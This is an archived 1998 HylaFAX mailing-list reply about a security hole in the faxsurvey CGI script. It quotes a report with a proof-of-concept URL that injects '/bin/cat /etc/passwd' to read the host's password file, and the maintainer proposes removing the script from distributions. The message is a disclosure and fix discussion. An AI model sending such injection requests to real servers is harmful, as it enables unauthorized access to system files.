 HylaFAX The world's
most advanced open source fax server
|
[Date Prev][Date Next][Thread Prev][Thread Next] [Date Index] [Thread Index]
Re: Security-Hole in faxsurvey-form
- To: Carsten Hoeger <choeger@suse.de>
- Subject: Re: flexfax: Security-Hole in faxsurvey-form
- From: Matthias Apitz <Matthias.Apitz@Sisis.de>
- Cc: flexfax@sgi.com
- Date: Wed, 29 Jul 1998 17:01:13 +0200
On Wed, Jul 29, 1998 at 03:20:05PM +0200, Carsten Hoeger wrote: > Hello all, > > > JFYI: > > > in the faxsurvey-cgi that comes with HylaFAX is a security-hole. > > If you try this: > > http://www.anyhost-with-this-cgi.com/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd > > > You can e.g. read the host's passwd... > > > If this survey is from interest, I'll make a bug-fix. Until a better solution for collecting the faxsurvey we should remove this from the distributiuons; matthias
- Prev by Date: Re: (no subject)
- Next by Date: Re: Security-Hole in faxsurvey-form
- Prev by thread: Security-Hole in faxsurvey-form
- Next by thread: Re: Security-Hole in faxsurvey-form
- Index(es):
Project hosted by iFAX Solutions